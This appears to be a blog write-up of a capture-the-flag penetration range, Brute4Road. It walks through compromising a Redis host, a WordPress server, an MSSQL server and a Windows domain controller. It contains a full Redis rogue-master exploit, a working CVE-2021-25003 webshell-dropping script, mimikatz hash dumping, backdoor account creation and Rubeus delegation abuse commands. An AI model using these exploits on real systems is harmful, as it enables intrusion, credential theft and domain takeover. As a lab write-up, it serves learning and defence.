春秋云境 Brute4Road

Brute4Road is a medium-difficulty range. Working through it covers proxying and port forwarding, internal scanning, information gathering, privilege escalation and lateral movement in an internal-network penetration, deepens the understanding of the core authentication mechanism of a domain environment (Kerberos), and touches a few interesting techniques of domain penetration. The range has four flags, spread across different hosts.

Prerequisites (earlier posts):

Internal network penetration notes (proxying)
Linux privilege escalation notes
Windows privilege escalation notes
Internal network penetration notes (Kerberos)


Entry point (172.22.2.7)

fscan, as always.

Port 6379 is open without authentication, so go for the Redis master-slave replication attack: point the victim at a rogue master, have it write the "RDB" it receives as a .so file, and load that as a module.
Reverse shell.
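The exchange behind that step, as an added example (not the author's code and not the tool used in the write-up): the attacker first tells the victim Redis to replicate from an attacker-controlled address and to store the next snapshot as a chosen file, then the victim connects back and performs the replica handshake, and the rogue master answers it with an arbitrary file in place of the RDB. The payload bytes here are a constructed placeholder (a real run needs an actual module such as the exp.so shipped with the public redis-rogue-server tooling), the attacker port 6666 and the path /tmp/exp.so are assumptions, and the module's own command is left out because it depends on which module is used.

```python
"""Rogue Redis master for the SLAVEOF / replication attack. Added example for
this write-up, not code from the original post. Both sides are shown: what the
attacker sends to the unauthenticated victim, and what the rogue master answers
when the victim connects back (PING, REPLCONF, PSYNC). The victim stores the
"RDB snapshot" we send as <dir>/<dbfilename>; with a .so there, MODULE LOAD
yields code execution. The payload bytes are a constructed placeholder."""
import socket

CRLF = b"\r\n"


def resp_array(*parts):
    """Encode a command as a RESP array, the wire form redis-cli and replicas use."""
    out = b"*%d%s" % (len(parts), CRLF)
    for p in parts:
        b = p.encode()
        out += b"$%d%s%s%s" % (len(b), CRLF, b, CRLF)
    return out


def parse_resp_array(buf):
    """Decode one RESP array from the front of buf -> (items, bytes_consumed); ValueError if incomplete."""
    if not buf.startswith(b"*"):
        raise ValueError("not a RESP array")
    end = buf.find(CRLF)
    if end < 0:
        raise ValueError("incomplete")
    count, pos, items = int(buf[1:end]), end + 2, []
    for _ in range(count):
        end = buf.find(CRLF, pos)
        if buf[pos:pos + 1] != b"$" or end < 0:
            raise ValueError("expected a complete bulk string")
        length, start = int(buf[pos + 1:end]), end + 2
        if len(buf) < start + length + 2:
            raise ValueError("incomplete")
        items.append(buf[start:start + length].decode())
        pos = start + length + 2
    return items, pos


def attack_script(attacker_ip, attacker_port, directory="/tmp", filename="exp.so"):
    """Commands sent to the victim: `before` makes it replicate from us and picks the
    file path; `after` (once the transfer is done) loads the module and detaches.
    The module's own command (system.exec / system.rev in common exp.so builds) is
    tool-specific and not hard-coded here."""
    before = [resp_array("SLAVEOF", attacker_ip, str(attacker_port)),
              resp_array("CONFIG", "SET", "dir", directory),
              resp_array("CONFIG", "SET", "dbfilename", filename)]
    after = [resp_array("MODULE", "LOAD", directory + "/" + filename),
             resp_array("SLAVEOF", "NO", "ONE")]
    return before, after


def rogue_reply(command, payload):
    """A real master answers PING/REPLCONF with simple strings and PSYNC with
    '+FULLRESYNC <replid> <offset>' plus the RDB as a bulk string; we send the payload instead."""
    name = command[0].upper()
    if name == "PING":
        return b"+PONG" + CRLF
    if name == "REPLCONF":
        return b"+OK" + CRLF
    if name == "PSYNC":
        header = b"+FULLRESYNC " + b"Z" * 40 + b" 1" + CRLF
        return header + b"$%d" % len(payload) + CRLF + payload
    return b"-ERR unsupported" + CRLF


class RogueMaster:
    """One victim connection: feed() bytes as they arrive and get back what to
    send; `done` is set once the payload has gone out."""
    def __init__(self, payload):
        self.payload, self.buf, self.done = payload, b"", False

    def feed(self, data):
        self.buf += data
        out = b""
        while self.buf and not self.done:
            try:
                cmd, used = parse_resp_array(self.buf)
            except ValueError:
                break  # wait for the rest of the frame
            self.buf = self.buf[used:]
            out += rogue_reply(cmd, self.payload)
            self.done = cmd[0].upper() == "PSYNC"
        return out


def serve(payload, bind_ip="0.0.0.0", port=6666):
    """Accept one victim and run the handshake; closing afterwards makes Redis flush the 'RDB' to disk."""
    with socket.create_server((bind_ip, port)) as srv:
        conn, peer = srv.accept()
        with conn:
            master = RogueMaster(payload)
            while not master.done:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(master.feed(data))
    return peer
```

Order of operations on a real target: send the `before` list to the victim on 6379, call `serve()` on the attacker host, wait for the victim to finish the handshake, then send the `after` list. Because the victim only writes the file once the master closes the connection, `serve()` returns as soon as the PSYNC reply has been sent.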

We land as the redis user. For privilege escalation look at SUID binaries: base64 is SUID here, which gives arbitrary file read as its owner (root), enough to read the flag.

flag01

```
[redis@centos-web01 db]$ base64 "/home/redis/flag/flag01" | base64 --decode
(ASCII-art banner)

flag01: flag{68ba4a2f-9561-46b9-8b03-d87a22290213}

Congratulations! ! !
Guess where is the second flag?
```

Internal network

Use netstat -ano to find the subnet we are on.

Upload fscan and scan the /24.

```
nohup fscan -h 172.22.2.7/24 > 1.txt &


[redis@centos-web01 db]$ cat 1.txt

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.2.18 is alive
(icmp) Target 172.22.2.16 is alive
(icmp) Target 172.22.2.3 is alive
(icmp) Target 172.22.2.7 is alive
(icmp) Target 172.22.2.34 is alive
[*] Icmp alive hosts len is: 5
172.22.2.3:445 open
172.22.2.16:445 open
172.22.2.18:445 open
172.22.2.3:139 open
172.22.2.16:139 open
172.22.2.34:135 open
172.22.2.34:139 open
172.22.2.18:139 open
172.22.2.3:135 open
172.22.2.16:135 open
172.22.2.16:80 open
172.22.2.18:22 open
172.22.2.7:80 open
172.22.2.18:80 open
172.22.2.7:22 open
172.22.2.7:21 open
172.22.2.7:6379 open
172.22.2.16:1433 open
172.22.2.34:445 open
172.22.2.3:88 open
[*] alive ports len is: 20
start vulscan
[*] NetInfo
[*]172.22.2.16
[->]MSSQLSERVER
[->]172.22.2.16
[*] NetInfo
[*]172.22.2.3
[->]DC
[->]172.22.2.3
[*] WebTitle http://172.22.2.16 code:404 len:315 title:Not Found
[*] NetInfo
[*]172.22.2.34
[->]CLIENT01
[->]172.22.2.34
[*] OsInfo 172.22.2.3 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.2.34 XIAORANG\CLIENT01
[*] OsInfo 172.22.2.16 (Windows Server 2016 Datacenter 14393)
[*] WebTitle http://172.22.2.7 code:200 len:4833 title:Welcome to CentOS
[*] NetBios 172.22.2.3 [+] DC:DC.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.2.18 WORKGROUP\UBUNTU-WEB02
[+] ftp 172.22.2.7:21:anonymous
[->]pub
[*] WebTitle http://172.22.2.18 code:200 len:57738 title:又一个WordPress站点
done 20/20
[*] scan finished, elapsed: 12.660045085s
```

Five hosts in total:

```
172.22.2.7      entry point, Redis
172.22.2.18     WordPress (UBUNTU-WEB02)
172.22.2.3      domain controller (DC.xiaorang.lab)
172.22.2.16     MSSQL (MSSQLSERVER.xiaorang.lab)
172.22.2.34     CLIENT01 (domain workstation)
```

Start a SOCKS proxy on the entry host with iox so the rest of the subnet can be reached through it:

```
nohup ./iox proxy -l 6666 &
```

WordPress(172.22.2.18)

Run wpscan against the WordPress site through the proxy:

```
proxychains4 wpscan --url http://172.22.2.18/ --api-token xxx
```

The WPCargo plugin has a known n-day, CVE-2021-25003 (WPCargo < 6.9.0): barcode.php takes an attacker-controlled filepath parameter, so a crafted barcode image whose bytes contain PHP can be written as a .php file under wp-content, giving unauthenticated RCE. The exploit script used:

```python
# @author : biulove0x
# @name : WP Plugins WPCargo Exploiter

## This is a magic string that when treated as pixels and compressed using the png
## algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
## payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'
## def encode_character_code(c: int):
##     return '{:08b}'.format(c).replace('0', 'x')
## text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

# References : https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a

from urllib3.exceptions import InsecureRequestWarning
import concurrent.futures
import requests, re, argparse

print(
'''
############################################
#   @author : biulove0x                    #
#   @name : WP Plugins WPCargo Exploiter   #
#   @cve : CVE-2021-25003                  #
############################################
''')

def wpcargo(_target, _timeout=5):
    # Barcode "text" that barcode.php renders into a PNG whose compressed bytes contain the webshell
    _payload = 'x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx'
    # filepath= is not sanitised: ../../../ from wpcargo/includes/ lands in wp-content/, and the
    # .php extension makes the server execute the "image"
    _endpoint = 'wp-content/plugins/wpcargo/includes/barcode.php?text='+ _payload +'&sizefactor=.090909090909&size=1&filepath=../../../wp-conf.php'
    _sessionget = requests.Session()
    _headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36'
    }
    def save_result(_result):
        with open('RESULT-WPCRGO.txt', 'a+') as _saved:
            _saved.write(_result + '\n')

    try:
        # 1) trigger the file write (_target must end with a trailing slash)
        _sessionget.get(url=_target + _endpoint, headers=_headers, allow_redirects=True, timeout=_timeout)
        # 2) verify: the dropped file is <?=$_GET[1]($_POST[2]);?>, i.e. ?1=<function>, POST 2=<argument>
        _validationshell = _sessionget.post(url=_target + 'wp-content/wp-conf.php?1=system', headers=_headers, allow_redirects=True, data={"2": "cat /etc/passwd"}, timeout=_timeout)

        if 'root:x:0:0:root' in _validationshell.text:
            print('[-] ' + _target + 'wp-content/wp-conf.php => Uploaded!')
            save_result(_target + 'wp-content/wp-conf.php?1=system')
        else:
            print('[+] ' + _target + ' Not found!')
    except:
        print('[%] ' + _target + ' Requests failed')

def main(_choose, _target):
    if _choose == 1:
        wpcargo(_target)

    elif _choose == 2:
        with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
            _ur_list = open(_target, 'r').read().split()
            _futures = [executor.submit(wpcargo, _target=_url) for _url in _ur_list]
            # wpcargo() prints its own result and returns None; just wait for every target
            for _future in concurrent.futures.as_completed(_futures):
                _future.result()

## SSL Bypass
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

## Setup args
_parser = argparse.ArgumentParser(description='CVE-2021-25003 [ WPCargo < 6.9.0 - Unauthenticated RCE ]')
_parser.add_argument('-t', metavar='example.com', type=str, help='Single target')
_parser.add_argument('-l', metavar='target.txt', type=str, help='Multiple target')
_args = _parser.parse_args()

## Variable args
_singleTarget = _args.t
_multiTarget = _args.l

if __name__ == '__main__':
    if not _singleTarget == None:
        _choose = 1
        main(_choose, _singleTarget)
    elif not _multiTarget == None:
        _choose = 2
        main(_choose, _multiTarget)
    else:
        print('WpCargo.py --help for using tools')
```

Connect to the dropped webshell (wp-content/wp-conf.php) with AntSword (蚁剑).

Read the database settings in /var/www/html/wp-config.php:

```php
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'wpuser' );

/** Database password */
define( 'DB_PASSWORD', 'WpuserEha8Fgj9' );

/** Database hostname */
define( 'DB_HOST', '127.0.0.1' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
```

After connecting to the database, flag02 is visible in it.

The table S0meth1ng_y0u_m1ght_1ntereSted also holds a list of passwords.

Use those passwords as a dictionary to brute-force the MSSQL service on .16:

```
fscan.exe -h 172.22.2.16 -m mssql -pwdf pass.txt
[+] mssql 172.22.2.16:1433:sa ElGNkOiC
```

MsSql(172.22.2.16)

Connect with MDUT. Enable the Ole Automation Procedures option first (MDUT's file upload goes through the sp_OACreate family of stored procedures, while command execution goes through xp_cmdshell, which is enabled the same way), upload SweetPotato.exe, and run it to go from the MSSQL service account, which typically holds SeImpersonatePrivilege (the privilege the potato family abuses), to SYSTEM.

flag03

```
C:/Users/Public/SweetPotato.exe -a "dir C:\Users\Administrator\flag\"
C:/Users/Public/SweetPotato.exe -a "type C:\Users\Administrator\flag\flag03.txt"
```

Checking the listening ports shows 3389 open; to make the following steps easier, add a local administrator and RDP in through the SOCKS proxy:

```
C:/Users/Public/SweetPotato.exe -a "netstat -ano"
C:/Users/Public/SweetPotato.exe -a "net user dr0n1 Qwer1234 /add"
C:/Users/Public/SweetPotato.exe -a "net localgroup administrators dr0n1 /add"
```

DC(172.22.2.3)

systeminfo shows the host is a member of the xiaorang.lab domain.

BloodHound or AdFind analysis shows that the MSSQLSERVER computer account is configured with constrained delegation (msDS-AllowedToDelegateTo) to the DC's LDAP and CIFS services.

Dump the logon hashes with mimikatz; the computer account's NTLM hash is what we need:

```
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit


Username : MSSQLSERVER$
Domain : XIAORANG
NTLM : 6cc34f4dd588e5adafca81c80b69b400
```

Request a TGT for MSSQLSERVER$ with Rubeus using that hash:

```
Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:6cc34f4dd588e5adafca81c80b69b400 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt
```

Copy the base64-encoded ticket from the output.

Then run Rubeus s4u with that TGT: S4U2Self obtains a ticket for Administrator to MSSQLSERVER$ itself, S4U2Proxy exchanges it for a ticket to the DC's CIFS service (one of the SPNs the delegation allows), and /ptt injects the result into the current session:

```
Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:<base64 TGT from 1.txt>
```

Read flag04 on the domain controller over SMB:

```
type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt
```

Alternatively, request the ticket for the LDAP/DC.xiaorang.lab SPN instead, use it to DCSync the administrator's hash, then pass-the-hash.


Source: https://www.dr0n.top/posts/7d7c5c9c/
Author: dr0n
Published: 2025-10-29
Updated: 2025-11-04